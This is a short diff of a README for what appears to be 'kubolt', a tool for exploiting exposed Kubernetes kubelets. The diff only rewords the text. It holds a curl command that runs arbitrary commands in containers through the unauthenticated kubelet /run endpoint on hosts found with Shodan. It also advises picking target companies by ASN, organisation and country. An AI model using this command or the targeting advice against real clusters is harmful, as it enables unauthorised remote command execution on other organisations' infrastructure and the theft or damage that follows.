averonesis/kubolt/README.md

 ```bash
 curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>"
 ```
-You could target companies more accurate using Shodan filters like this:
+You can target companies more accurate using Shodan filters such as:
 - asn
 - org
 - country